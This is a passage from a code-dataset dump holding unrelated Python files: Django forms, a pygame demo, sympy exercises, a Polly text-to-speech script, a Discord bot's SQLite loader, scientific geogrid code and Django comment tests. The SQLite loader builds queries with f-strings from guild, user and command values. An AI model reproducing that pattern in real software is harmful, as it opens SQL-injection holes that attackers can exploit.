pass\n\n\nclass IngredientOrderForm(forms.Form):\n def __init__(self, *args, **kwargs):\n ingredients = kwargs.pop(\"ingredients\")\n super(IngredientOrderForm, self).__init__(*args, **kwargs)\n for ingredient in ingredients:\n self.fields[ingredient.name] = forms.ChoiceField(\n choices=INGREDIENT_CHOICES, widget=forms.RadioSelect()\n )\n\n self._ingredients_by_name = {i.name: i for i in ingredients}\n\n @property\n def needed(self):\n if not self.is_valid():\n raise InvalidFormError(\"Ingredients form is not valid\")\n return [\n self._ingredients_by_name[i]\n for i, status in self.cleaned_data.items()\n if status == \"need\"\n ]\n\n @property\n def got(self):\n if not self.is_valid():\n raise InvalidFormError(\"Ingredients form is not valid\")\n return [\n self._ingredients_by_name[i]\n for i, status in self.cleaned_data.items()\n if status == \"have\"\n ]\n\n\ndef week_choices(today, include=None):\n \"\"\"Return available scheduling choices for the next week.\n\n Include a \"None\" option, to remove an already-scheduled date.\n\n The `include` argument will make sure that a specified date is in the list\n of choices, for forms where a date outside the usual range is already\n scheduled.\n \"\"\"\n unset_choice = (\"\", \"-- Unscheduled --\")\n days = {today + timedelta(days=offset) for offset in range(7)}\n if include is not None:\n days.add(include)\n\n return [unset_choice] + [\n (day.isoformat(), date_name(day, today=today)) for day in sorted(days)\n ]\n\n\nclass MealDateForm(forms.ModelForm):\n class Meta:\n model = Meal\n fields = [\"date\"]\n\n def __init__(self, *args, **kwargs):\n today_func = kwargs.pop(\"today_func\", timezone.localdate)\n instance = kwargs[\"instance\"]\n prefix = str(instance.id)\n super(MealDateForm, self).__init__(*args, **kwargs, prefix=prefix)\n\n # We need to set this up explicitly on init so that the the date\n # choices are calculated each time, rather than baked in at load time.\n date_widget = forms.Select(\n choices=week_choices(today=today_func(), include=instance.date)\n )\n date_field = forms.DateField(required=False, widget=date_widget)\n date_field.label = \"\"\n self.fields[\"date\"] = date_field\n","repo_name":"dhwthompson/trencher","sub_path":"plan/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73587469372","text":"#!/usr/bin/env python\nimport pygame\nfrom pygame.locals import (\n FULLSCREEN,\n DOUBLEBUF,\n )\n\n\nwhite = (255,) * 3\ndark_green = 25, 85, 45\nlight_green = 200, 255, 200\n\nfood_image_file = 'data/spider_plant.png'\nbug_image_file = 'data/bug0.png'\n\nSCREEN_WIDTH, SCREEN_HEIGHT = SCREEN_DIMENSIONS = 800, 600 # 1024, 768\n\n\nscreen = pygame.display.set_mode(SCREEN_DIMENSIONS, DOUBLEBUF)\nscreen.fill(light_green)\n\nfood_image = pygame.image.load(food_image_file)\nbug_image = pygame.image.load(bug_image_file)\n\nscreen.blit(food_image, (133, 100))\nscreen.blit(bug_image, (100, 90))\n\npygame.display.flip()\n\nraw_input('Press enter to quit..')\n","repo_name":"calroc/sbonu","sub_path":"pg_sbonu.py","file_name":"pg_sbonu.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28309050885","text":"import tokenize\nimport sympy\nfrom sympy import Integer\nfrom sympy import Float\nfrom sympy import Symbol\n\n\n# Exercise 1\ninput_value = input('Please enter an argument of any type in Python format:')\n\n\n# Function to detect value (argument) type\ndef arg_type(value):\n value_type = type(value)\n\n return value_type\n\n# Parsing argument from input\ntry:\n sympy_value = sympy.parsing.sympy_parser.parse_expr(input_value)\nexcept tokenize.TokenError:\n print('Invalid argument, please enter an argument of any type in Python format!')\nexcept SyntaxError:\n print('It is not an argument! please enter an argument of any type in Python format!')\nelse:\n complete_output = arg_type(sympy_value)\n print(f'Type of your value is: {complete_output}')\n\n\n# Exercise 2\ninput_value = input('Please enter argument of any type in Python format:')\n\n\n# Function to make from value to float or return float 0\ndef arg_float(value):\n try:\n float(value)\n except TypeError:\n output_value = float(0)\n\n return output_value\n else:\n output_value = float(value)\n\n return output_value\n\n\n# Parsing argument from input\ntry:\n sympy_value = sympy.parsing.sympy_parser.parse_expr(input_value)\nexcept tokenize.TokenError:\n print('Invalid argument, please enter an argument of any type in Python format!')\nexcept SyntaxError:\n print('It is not an argument! please enter an argument of any type in Python format!')\nelse:\n complete_output = arg_float(sympy_value)\n if complete_output == float(0):\n print(f'Python cannot make float from this value, so we return: {complete_output}')\n else:\n print(f'Python successfully maid float from your value, it is: {complete_output}')\n\n\n# Exercise 2\ninput_value1 = input('Please enter a 1st argument of any type in Python format:')\ninput_value2 = input('Please enter a 2nd argument of any type in Python format:')\n\n\n# Final function with boolean and types\ndef two_arg(value1, value2):\n value_type1 = type(value1)\n value_type2 = type(value2)\n\n int_bool1 = isinstance(value1, Integer)\n float_bool1 = isinstance(value1, Float)\n int_bool2 = isinstance(value2, Integer)\n float_bool2 = isinstance(value2, Float)\n\n symbol_bool1 = isinstance(value1, Symbol)\n str_bool1 = isinstance(value_type1, str)\n symbol_bool2 = isinstance(value2, Symbol)\n str_bool2 = isinstance(value_type2, str)\n\n if (int_bool1 or float_bool1) and (int_bool2 or float_bool2):\n math_diff = value1 - value2\n\n return math_diff\n\n elif (str_bool1 or symbol_bool1) and (str_bool2 or symbol_bool2):\n str_concat = str(value1) + str(value2)\n\n return str_concat\n\n elif (str_bool1 or symbol_bool1) and not (str_bool2 or symbol_bool2):\n output_dict = {str(value1): value2}\n\n return output_dict\n\n else:\n output_tuple = (value1, value2)\n\n return output_tuple\n\n\n# Parsing value (argument) from input\ntry:\n sympy_value1 = sympy.parsing.sympy_parser.parse_expr(input_value1)\n sympy_value2 = sympy.parsing.sympy_parser.parse_expr(input_value2)\nexcept tokenize.TokenError:\n print('Invalid Python argument, please enter any argument in Python format!')\nexcept SyntaxError:\n print('It is not a Python argument! Please enter any argument in Python format!!!')\nelse:\n print(f'Your output is: {two_arg(sympy_value1, sympy_value2)}')\n","repo_name":"Regato/AQAHillel","sub_path":"HW5/HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32759559109","text":"#!/usr/bin/python\n# encoding=utf8\nimport codecs\nimport datetime\nimport os\nimport re\nimport shutil\nimport sys\nimport os\nimport boto3\n\ndefaultRegion = 'us-east-1'\ndefaultUrl = 'https://polly.us-east-1.amazonaws.com'\n\nclass MyString:\n def __init__(self, string):\n self.string = string\n def __div__(self, div):\n l = []\n for i in range(0, len(self.string), div):\n l.append(self.string[i:i+div])\n return l\n\ndef connectToPolly(regionName=defaultRegion, endpointUrl=defaultUrl):\n return boto3.client('polly', region_name=regionName, endpoint_url=endpointUrl)\n\ndef speak(polly, text, path):\n format = 'mp3'\n voice = 'Brian'\n resp = polly.synthesize_speech(OutputFormat=format, Text=text, VoiceId=voice)\n soundfile = open(path, 'w')\n soundBytes = resp['AudioStream'].read()\n soundfile.write(soundBytes)\n soundfile.close()\n # os.system('afplay /tmp/sound.mp3') # Works only on Mac OS, sorry\n # os.remove('/tmp/sound.mp3')\n\npolly = connectToPolly()\nsource = './shows/'\nfor root, dirs, posts in os.walk(source):\n for post in posts:\n post_full_path = os.path.join(source, post)\n post = codecs.open(post_full_path, 'r')\n post_readable = post.read();\n m = MyString(post_readable)\n break_up = m/1500\n new_post = break_up[0]\n new_path = post_full_path.replace('./shows/', './dist/').replace('.txt', '.mp3')\n\n\n speak(polly, new_post, new_path)\n\n\n\n#\n# polly = connectToPolly()\n# # icelandicString =\n# speak(polly, \"Hello world, I'm Polly. Or Brian. Or anyone you want, really.\")\n# # speak(polly, icelandicString.decode('utf8'), voice='Karl')\n","repo_name":"terrillo/Archives","sub_path":"2017-04/the-anchoring/source/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"20258537240","text":"import sys\nread = lambda : sys.stdin.readline()\n\nwhile 1:\n w,h = map(int,input().split())\n matrix = [list(map(int,list(read().strip()))) for _ in range(w)]\n ans = []\n\n def dfs(x,y):\n\n matrix[x][y] = 0\n n_x = [1, 1, 1,-1,-1,-1, 0, 0]\n n_y = [0, 1,-1, 0, 1,-1, 1,-1]\n for i in range(8):\n d_x = x + n_x[i]\n d_y = y + n_y[i]\n\n if 0<=d_x < h and 0<=d_y number:\r\n print(\"Число больше загаданого\")\r\n elif guess == number:\r\n break\r\n\r\nif guess == number:\r\n if guess_made == 1:\r\n print(f\"{name}, ты угадал число за {guess_made} ход! :)\")\r\n elif guess_made >= 2 and guess_made <= 4:\r\n print(f\"{name}, ты угадал число за {guess_made} хода! :)\")\r\n else:\r\n print(f\"{name}, ты угадал число за {guess_made} ходов! :)\")\r\nelse:\r\n print(f\"Извини, {name} - в следующий раз получится! :(\")\r\n print(f\"RandomGame загадала число - {number}\")\r\n ","repo_name":"Leevladislove/Python_Projects","sub_path":"random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71134447931","text":"import sqlite3\nimport discord\nfrom random import random as rand\nfrom CommandTemplate import CommandTemplate as template\nfrom sqlite3 import Error\n\nclass SqlLoader:\n # Load and test the database\n def create_connection(self, db_file):\n \"\"\" Creates the connection to the SQLite database \"\"\"\n self.conn = None\n try:\n self.conn = sqlite3.connect(db_file)\n if db_file == 'ranks.db':\n self.ranks_db_file = db_file\n self.create_new_ranks_db()\n elif db_file == 'commands.db':\n self.cmds_db_file = db_file\n self.create_new_cmds_db()\n else:\n self.db_file = db_file\n print(f'Connected to {db_file}!')\n try:\n c = self.conn.cursor()\n except Error:\n if db_file == 'ranks.db':\n self.create_new_ranks_db()\n elif db_file == 'commands.db':\n self.create_new_cmds_db()\n else:\n print('Invalid database')\n except Error as e:\n print(e)\n finally:\n if self.conn:\n self.conn.close()\n\n # Ranks Database\n def add_xp_to_user(self, user, guild):\n \"\"\" Adds XP to a given user in a certain server \"\"\"\n self.conn = sqlite3.connect(self.ranks_db_file)\n c = self.conn.cursor()\n try:\n c.execute(f\"SELECT xp FROM ranks WHERE user = {user} AND guild = {guild}\")\n current_xp_value = c.fetchone()\n new_xp_value = current_xp_value[0] + round(rand() * 20) + 1\n c.execute(f\"UPDATE ranks SET xp = {new_xp_value} WHERE user = {user} AND guild = {guild}\")\n except TypeError:\n start_xp_value = round(rand() * 20) + 1\n c.execute(f\"INSERT INTO ranks VALUES ('{guild}','{user}','{start_xp_value}')\")\n self.conn.commit()\n self.conn.close()\n\n def get_rank(self, user, guild):\n \"\"\" Gets the level and xp of a user in a certain server \"\"\"\n self.conn = sqlite3.connect(self.ranks_db_file)\n c = self.conn.cursor()\n try:\n c.execute(f\"SELECT xp FROM ranks WHERE user = {user} AND guild = {guild}\")\n current_xp_value = c.fetchone()\n return int(current_xp_value[0])\n except TypeError:\n return 0\n self.conn.commit()\n self.conn.close()\n\n def create_new_ranks_db(self):\n \"\"\" Creates the table in case it does not exist yet \"\"\"\n c = self.conn.cursor()\n c.execute('''CREATE TABLE ranks\n (guild int, user int, xp int)''')\n self.conn.commit()\n self.conn.close()\n\n # Commands database\n def get_commands(self, guild):\n \"\"\" Gets all of the given commands of a server \"\"\"\n self.conn = sqlite3.connect(self.cmds_db_file)\n c = self.conn.cursor()\n try:\n c.execute(f\"SELECT * FROM commands WHERE guild = {guild}\")\n return c.fetchall()\n except TypeError:\n return None\n\n def run_command(self, guild, user, arg1, name):\n \"\"\" Executes the custom command of a server \"\"\"\n self.conn = sqlite3.connect(self.cmds_db_file)\n c = self.conn.cursor()\n c.execute(f\"SELECT * FROM commands WHERE guild = {guild} AND command = '{name}'\")\n row = c.fetchone()\n temp = template(user, arg1, row[1], row[2], row[3], row[4], url=row[5], min=row[6], max=row[7])\n return temp.embed\n\n def create_new_cmds_db(self):\n \"\"\" Creates the table in case it does not exist yet \"\"\"\n c = self.conn.cursor()\n c.execute('''CREATE TABLE commands\n (guild int, command text, type text, info text, description text, url text, min int, max int)''')\n self.conn.commit()\n self.conn.close()\n\n # Initiate the databases\n def __init__(self):\n self.create_connection(r\"ranks.db\")\n self.create_connection(r\"commands.db\")\n\n\n","repo_name":"tymmc2/Hanabana","sub_path":"SqlLoader.py","file_name":"SqlLoader.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26498807377","text":"import sys\nsys.path.append('../functions/')\nfrom tree import TreeNode\nfrom typing import List\n\n\nclass Solution:\n def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n \tif root == None:\n \t\treturn None\n \tls, l, queue = [], [], []\n \tqueue.append(root)\n \tlens, count = 1, 0\n \twhile len(queue) > 0:\n \t\tp = queue.pop(0)\n \t\tl.append(p.val)\n \t\tcount += 1\n \t\tif p.left != None:\n \t\t\tqueue.append(p.left)\n \t\tif p.right != None:\n \t\t\tqueue.append(p.right)\n \t\tif lens == count:\n \t\t\tls.insert(0, l.copy())\n \t\t\tl = []\n \t\t\tcount = 0\n \t\t\tlens = len(queue)\n \treturn ls\n\n","repo_name":"ZiyaoGeng/LeetCode","sub_path":"Code/107.py","file_name":"107.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12162161862","text":"from .arkhangelskiy_corpora import PageParser\n\nlanguage = 'kazakh'\nresults = 'http://web-corpora.net/KazakhCorpus/search/results.php'\n\nTEST_DATA = {'test_single_query': {'query': 'мысық'},\n 'test_multi_query': {'query': ['мысық', 'сүю']}\n }\n\n__author__ = 'ustya-k'\n__doc__ = \\\n\"\"\"\nAlmaty Corpus of the Kazakh Language\n====================================\n \nAPI for Almaty corpus of the Kazakh language\n(http://web-corpora.net/KazakhCorpus/search/).\n \n**Search Parameters**\n\nquery: str or list([str]):\n query or queries\nn_results: int, default 100\n number of results wanted\nkwic: bool, default True\n kwic format (True) or a sentence (False)\nget_analysis: bool, default False\n tags shown (True) or not (False)\n\nExample\n-------\n\n.. code-block:: python\n\n corp = lingcorpora.Corpus('kaz')\n results = corp.search('тілі', n_results=10)\n for result in results:\n for i, target in enumerate(result):\n print(i+1, target.text)\n\n.. parsed-literal::\n\n \"тілі\": 100%|██████████| 10/10 [00:01<00:00, 6.49docs/s]\n\n 1 Шетел тілі ана тілімен қоса баланың сөйлеу қабілетін және жалпы дамуын ғана жетілдіріп қоймайды, оны өзін қоршаған айналасындағы адамдармен қарым-қатынас мәдениетіне де үйретеді.\n 2 Ағылшын тілі сабағында тиянақты және сапалы білім беру тәрбие жұмысымен күнделікті бірлікте жүргізілуі тиісті екені күнделікті тәжірибеде дәлелденгені айқын.\n 3 Ағылшын тілі пәні бойынша білім мазмұнына тақырыптар, қарым – қатынас ситуациялары, мәтіндер, тілдік материалдар; лексикалық, грамматикалық, фонетикалық, практикалық біліктер, сөз әдептері, оқу әрекетінің тиімділігін іске асыратын жалпы оқу білік дағдылары жатады.\n 4 Халықаралық қатынастар мен бизнес, туризм,әлемдік экономика мен саясат, білім және ғылым саласы мен озықтехнология, құқық пен мәдениет салаларының халықаралық аренадағы негізгі қолданыс тілі ағылшын тілі болып отыр.\n 5 Қазіргі таңда шет тілі ретінде ағылшын тілін оқытуды жаңа сатыға көтеру отандық педагогикадағы іргелі міндеттердің біріне айналып отыр.Өйткені, елімізде Қазақстан Республикасының Президенті Н Ә Назарбаевтың бастамасымен «Үштұғырлы тіл » мәдени жобасын дамыту басымдыққа айналып, соның ішінде жаһандану жағдайында әлемдік интеграцияға кірігу тілі ретінде ағылшын тіліне мән берілуде.\n 6 Қазіргі таңда шет тілі ретінде ағылшын тілін оқытуды жаңа сатыға көтеру отандық педагогикадағы іргелі міндеттердің біріне айналып отыр.Өйткені, елімізде Қазақстан Республикасының Президенті Н Ә Назарбаевтың бастамасымен «Үштұғырлы тіл » мәдени жобасын дамыту басымдыққа айналып, соның ішінде жаһандану жағдайында әлемдік интеграцияға кірігу тілі ретінде ағылшын тіліне мән берілуде.\n 7 Халықаралық қатынастар мен бизнес, туризм,әлемдік экономика мен саясат, білім және ғылым саласы мен озықтехнология, құқық пен мәдениет салаларының халықаралық аренадағы негізгі қолданыс тілі ағылшын тілі болып отыр.\n 8 Шет тілдердің арасында ағылшын тілі баяғыда-ақ алғашқы орынды иеленді.\n 9 Кез-келген мектепті алмайык, тіпті ауылдық жерлердегі мекетептерде де ағылшын тілі қазақ б��лаларының ана тілінде жүргізілген жок.\n 10 Ағылшын тілін қазақ тілі арқылы оқып-тану өте сирек кездесетін жайт болатын.\n\n\"\"\"\n\n\nclass PageParser(PageParser):\n\n def __init__(self, *args, **kwargs):\n super().__init__(language, results, *args, **kwargs)\n","repo_name":"iddave/lingcorpora-OseCorp","sub_path":"lingcorpora/corpora/kaz_corpus.py","file_name":"kaz_corpus.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"kk","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"1930945921","text":"'''\ncollection of functions for determing and setting geogrid\n'''\n\nimport numpy as np\n\nimport journal\n\nfrom osgeo import osr\n\nimport isce3\nfrom nisar.products.readers import SLC\n\n\ndef _grid_size(stop, start, sz):\n '''\n get grid dim based on start, end, and grid size inputs\n '''\n # check for invalid and return invalid size value\n if None in [stop, start, sz]:\n return np.nan\n\n return int(np.ceil(np.abs((stop-start)/sz)))\n\n\ndef create(cfg, workflow_name=None, frequency_group=None,\n frequency=None, geocode_dict=None,\n default_spacing_x=None, default_spacing_y=None,\n is_geo_wrapped_igram=False):\n '''\n - frequency_group is the name of the sub-group that\n holds the fields x_posting and y_posting, which is usually\n the frequency groups \"A\" or \"B\". If these fields\n are direct member of the output_posting group, e.g\n for radar_grid_cubes, the frequency_group should be left\n as None.\n - frequency is the frequency name, if not provided, it will be\n the same as the frequency_group.\n - geocode_dict overwrites the default geocode_dict from\n processing.geocode\n - default_spacing_x is default pixel spacing in the X-direction\n - default_spacing_y is default pixel spacing in the Y-direction\n - is_geo_wrapped_igram is the flag indicating the geogrid of wrapped interferogram\n For production we only fix epsgcode and snap value and will\n rely on the rslc product metadta to compute the bounding box of the geocoded products\n there is a place holder in SLC product for compute Bounding box\n when that method is populated we should be able to simply say\n bbox = self.slc_obj.computeBoundingBox(epsg=state.epsg)\n for now let's rely on the run config input\n '''\n error_channel = journal.error('geogrid.create')\n\n # unpack and init\n if geocode_dict is None:\n geocode_dict = cfg['processing']['geocode']\n\n if workflow_name == 'insar':\n input_hdf5 = cfg['input_file_group']['reference_rslc_file']\n else:\n input_hdf5 = cfg['input_file_group']['input_file_path']\n dem_file = cfg['dynamic_ancillary_file_group']['dem_file']\n slc = SLC(hdf5file=input_hdf5)\n\n # unpack and check cfg dict values. default values set to trigger inside fix(...)\n epsg = geocode_dict['output_epsg']\n start_x = geocode_dict['top_left']['x_abs']\n start_y = geocode_dict['top_left']['y_abs']\n\n if frequency is None:\n frequency = frequency_group\n\n # if geocode the wrapped inteferogram\n geo_wrapped_igram = (workflow_name == 'insar') and is_geo_wrapped_igram\n\n output_posting_group = geocode_dict['output_posting']\\\n if not geo_wrapped_igram else geocode_dict['wrapped_interferogram']\n\n if frequency_group is None:\n spacing_x = output_posting_group['x_posting']\n spacing_y = output_posting_group['y_posting']\n else:\n if geo_wrapped_igram:\n spacing_x = output_posting_group['output_posting']\\\n [frequency_group]['x_posting']\n spacing_y = output_posting_group['output_posting']\\\n [frequency_group]['y_posting']\n else:\n spacing_x = output_posting_group[frequency_group]['x_posting']\n spacing_y = output_posting_group[frequency_group]['y_posting']\n\n end_x = geocode_dict['bottom_right']['x_abs']\n end_y = geocode_dict['bottom_right']['y_abs']\n\n assert epsg is not None\n assert 1024 <= epsg <= 32767\n\n if spacing_y is not None:\n\n # spacing_y from runconfig should be positive valued\n assert spacing_y > 0.0\n spacing_y = -1.0 * spacing_y\n\n # copy X spacing from default X spacing (if applicable)\n if spacing_x is None and default_spacing_x is not None:\n spacing_x = default_spacing_x\n\n # copy Y spacing from default Y spacing (if applicable)\n if spacing_y is None and default_spacing_y is not None:\n spacing_y = default_spacing_y\n\n if spacing_x is None or spacing_y is None:\n dem_raster = isce3.io.Raster(dem_file)\n\n # Set pixel spacing using the input DEM (same EPSG)\n if epsg == dem_raster.get_epsg():\n\n # copy X spacing from DEM\n if spacing_x is None:\n spacing_x = dem_raster.dx\n\n # DEM X spacing should be positive\n if spacing_x <= 0:\n err_str = f'Expected positive pixel spacing in the X/longitude direction'\n err_str += f' for DEM {dem_file}. Actual value: {spacing_x}.'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n # copy Y spacing from DEM\n if spacing_y is None:\n spacing_y = dem_raster.dy\n\n # DEM Y spacing should be negative\n if spacing_y >= 0:\n err_str = f'Expected negative pixel spacing in the Y/latitude direction'\n err_str += f' for DEM {dem_file}. Actual value: {spacing_y}.'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n else:\n epsg_spatial_ref = osr.SpatialReference()\n epsg_spatial_ref.ImportFromEPSG(epsg)\n\n # Set pixel spacing in degrees (lat/lon)\n if epsg_spatial_ref.IsGeographic():\n if spacing_x is None:\n spacing_x = 0.00017966305682390427\n if spacing_y is None:\n spacing_y = -0.00017966305682390427\n\n # Set pixel spacing in meters\n else:\n if spacing_x is None:\n spacing_x = 20\n if spacing_y is None:\n spacing_y = -20\n\n if spacing_x == 0.0 or spacing_y == 0.0:\n err_str = 'spacing_x or spacing_y cannot be 0.0'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n # init geogrid\n if None in [start_x, start_y, epsg, end_x, end_y]:\n\n # extract other geogrid params from radar grid and orbit constructed bounding box\n geogrid = isce3.product.bbox_to_geogrid(slc.getRadarGrid(frequency),\n slc.getOrbit(),\n isce3.core.LUT2d(),\n spacing_x, spacing_y, epsg)\n\n # restore runconfig start_x (if provided)\n if start_x is not None:\n end_x_from_function = geogrid.start_x + geogrid.spacing_x * geogrid.width\n geogrid.start_x = start_x\n geogrid.width = int(np.ceil((end_x_from_function - start_x) /\n geogrid.spacing_x))\n\n # restore runconfig end_x (if provided)\n if end_x is not None:\n geogrid.width = int(np.ceil((end_x - geogrid.start_x) /\n geogrid.spacing_x))\n\n # restore runconfig start_y (if provided)\n if start_y is not None:\n end_y_from_function = geogrid.start_y + geogrid.spacing_y * geogrid.length\n geogrid.start_y = start_y\n geogrid.length = int(np.ceil((end_y_from_function - start_y) /\n geogrid.spacing_y))\n\n # restore runconfig end_y (if provided)\n if end_y is not None:\n geogrid.length = int(np.ceil((end_y - geogrid.start_y) /\n geogrid.spacing_y))\n\n else:\n width = _grid_size(end_x, start_x, spacing_x)\n length = _grid_size(end_y, start_y, -1.0*spacing_y)\n\n # build from probably good user values\n geogrid = isce3.product.GeoGridParameters(start_x, start_y,\n spacing_x, spacing_y,\n width, length, epsg)\n\n # recheck x+y end points before snap and length+width calculation\n end_pt = lambda start, sz, spacing: start + spacing * sz\n\n if end_x is None:\n end_x = end_pt(geogrid.start_x, geogrid.spacing_x, geogrid.width)\n\n if end_y is None:\n end_y = end_pt(geogrid.start_y, geogrid.spacing_y, geogrid.length)\n\n # snap all the things\n x_snap = geocode_dict['x_snap']\n y_snap = geocode_dict['y_snap']\n\n # Change the snap if it is to geocode the wrapped interferogram\n if geo_wrapped_igram:\n x_snap = output_posting_group['x_snap']\n y_snap = output_posting_group['y_snap']\n\n if x_snap is not None or y_snap is not None:\n # check snap values before proceeding\n if x_snap <= 0 or y_snap <= 0:\n err_str = 'Snap values must be > 0.'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n if x_snap % spacing_x != 0.0 or y_snap % spacing_y != 0:\n err_str = 'Snap values must be exact multiples of spacings. i.e. snap % spacing == 0.0'\n error_channel.log(err_str)\n raise ValueError(err_str)\n\n snap_coord = lambda val, snap, round_func: round_func(float(val) / snap) * snap\n geogrid.start_x = snap_coord(geogrid.start_x, x_snap, np.floor)\n geogrid.start_y = snap_coord(geogrid.start_y, y_snap, np.ceil)\n end_x = snap_coord(end_x, x_snap, np.ceil)\n end_y = snap_coord(end_y, y_snap, np.floor)\n geogrid.length = _grid_size(end_y, geogrid.start_y, geogrid.spacing_y)\n geogrid.width = _grid_size(end_x, geogrid.start_x, geogrid.spacing_x)\n\n return geogrid\n","repo_name":"isce-framework/isce3","sub_path":"python/packages/nisar/workflows/geogrid.py","file_name":"geogrid.py","file_ext":"py","file_size_in_byte":9462,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"78"} +{"seq_id":"32602675619","text":"import mock\n\nfrom datetime import datetime\n\nfrom django.contrib import comments\nfrom django.test import TestCase\n\nfrom ella.core.cache.redis import client\nfrom ella.utils.test_helpers import create_basic_categories, create_and_place_a_publishable\nfrom ella.utils.timezone import utc_localize, use_tz\n\nfrom ella_comments import listing_handlers\n\nfrom nose import tools, SkipTest\n\nfrom test_ella_comments.helpers import create_comment\n\n\nclass TestListingHandlers(TestCase):\n def setUp(self):\n if not client:\n raise SkipTest()\n\n super(TestListingHandlers, self).setUp()\n create_basic_categories(self)\n create_and_place_a_publishable(self)\n client.flushdb()\n\n def test_aa(self):\n day = datetime.now().strftime('%Y%m%d')\n create_comment(self.publishable, self.publishable.content_type, user_name='kvbik', submit_date=utc_localize(datetime(2010, 10, 10, 10, 10, 10)))\n ct_id = self.publishable.content_type_id\n tools.assert_equals(set([\n 'slidingccount:WINDOWS',\n 'slidingccount:KEYS',\n\n 'comcount:2',\n 'lastcom:2',\n 'slidingccount:2',\n\n 'comcount:c:1',\n 'comcount:c:2',\n 'lastcom:c:1',\n 'lastcom:c:2',\n 'slidingccount:c:1',\n 'slidingccount:c:2',\n\n 'lastcom:d:1',\n 'lastcom:d:2',\n 'comcount:d:1',\n 'comcount:d:2',\n 'slidingccount:d:1',\n 'slidingccount:d:2',\n\n 'lastcom:ct:%d' % ct_id,\n 'comcount:ct:%d' % ct_id,\n 'slidingccount:ct:%d' % ct_id,\n\n\n 'lastcom:pub:%d:1' % ct_id,\n 'comcount:pub:%d:1' % ct_id,\n\n\n 'slidingccount:2:%s' % day,\n 'slidingccount:c:1:%s' % day,\n 'slidingccount:c:2:%s' % day,\n 'slidingccount:d:1:%s' % day,\n 'slidingccount:d:2:%s' % day,\n 'slidingccount:ct:%d:%s' % (ct_id, day),\n\n ]), set(client.keys('*')))\n\n if use_tz:\n # timestamps are stored in utc time\n tstamp = '1286705410.0'\n else:\n tstamp = '1286698210.0'\n tools.assert_equals({'submit_date': tstamp, 'user_id': '', 'username': 'kvbik', 'comment': '', 'url': ''}, client.hgetall('lastcom:pub:%d:1' % ct_id))\n tools.assert_equals('1', client.get('comcount:pub:%d:1' % ct_id))\n\nclass TestCommentPostSaveSignalHandler(TestListingHandlers):\n \" Unit tests for `ella_comments.listing_handlers.comment_post_save()`. \"\n def setUp(self):\n super(TestCommentPostSaveSignalHandler, self).setUp()\n\n # Assert that no comments are in the system\n tools.assert_equals(comments.get_model()._default_manager.count(), 0)\n\n # Assert that the `publishable`'s comment count does not exist yet\n tools.assert_false(client.exists(listing_handlers.COMCOUNT_KEY % (self.publishable.content_type_id, self.publishable.pk)))\n\n def _build_publishable_comment_count_key(self, publishable):\n \" Util method to consistently build the comment count key for a publishable. \"\n return listing_handlers.COMCOUNT_KEY % (publishable.content_type_id, publishable.pk)\n\n def _create_comment(self):\n \" Util method to create and return a new commnt. \"\n return create_comment(\n self.publishable,\n self.publishable.content_type,\n user_name='kvbik',\n submit_date=utc_localize(datetime(2010, 10, 10, 10, 10, 10))\n )\n\n def test_no_change_to_comment_publicity(self):\n \"\"\"\n Assert that no change made to the `is_public` or `is_removed` properties of a\n comment result in no changes to the comment count or last comment keys of the content object.\n \"\"\"\n # Create a new public comment on the publishable\n comment = self._create_comment()\n tools.assert_equals(comments.get_model()._default_manager.count(), 1)\n tools.assert_equals(comments.get_model()._default_manager.filter(is_public=True, is_removed=False).count(), 1)\n\n # Assert that the comment count key on the publishable was set correctly to 1\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 1\n )\n\n # Update this comment (but do not change \"publicity\") and assert that\n # nothing has changed regarding the comment count on the publishable\n comment.comment = 'New comment text'\n tools.assert_true(comment.is_public)\n tools.assert_false(comment.is_removed)\n comment.save()\n\n # Assert that the comment count key on the publishable is still set correctly to 1\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 1\n )\n\n def test_modify_comment_publicity(self):\n \"\"\"\n Assert that a modification made to the `is_public` or `is_removed` properties of a\n comment result in changes to the comment count of the content object.\n \"\"\"\n # Create a new public comment on the publishable\n comment = self._create_comment()\n tools.assert_equals(comments.get_model()._default_manager.count(), 1)\n tools.assert_equals(comments.get_model()._default_manager.filter(is_public=True, is_removed=False).count(), 1)\n\n # Assert that the comment count key on the publishable was set correctly to 1\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 1\n )\n\n # Update this comment (and change \"publicity\" of it)\n comment.is_public = False\n comment.save()\n\n # Assert that the comment count key on the publishable has been updated to reflect\n # the fact that there are 0 public comments associated to it.\n tools.assert_equals(\n int(client.get(self._build_publishable_comment_count_key(self.publishable))),\n 0\n )\n\n @mock.patch.object(listing_handlers, 'client')\n def test_client_invoked(self, mock_client):\n \"\"\"\n Call `comment_post_save()` with a comment that has been modified,\n and assert that the client was not invoked.\n \"\"\"\n # Create a new public comment\n comment = self._create_comment()\n\n # Programatically set the `__pub_info` data on the comment\n setattr(comment, '__pub_info', {\n 'is_public': False,\n 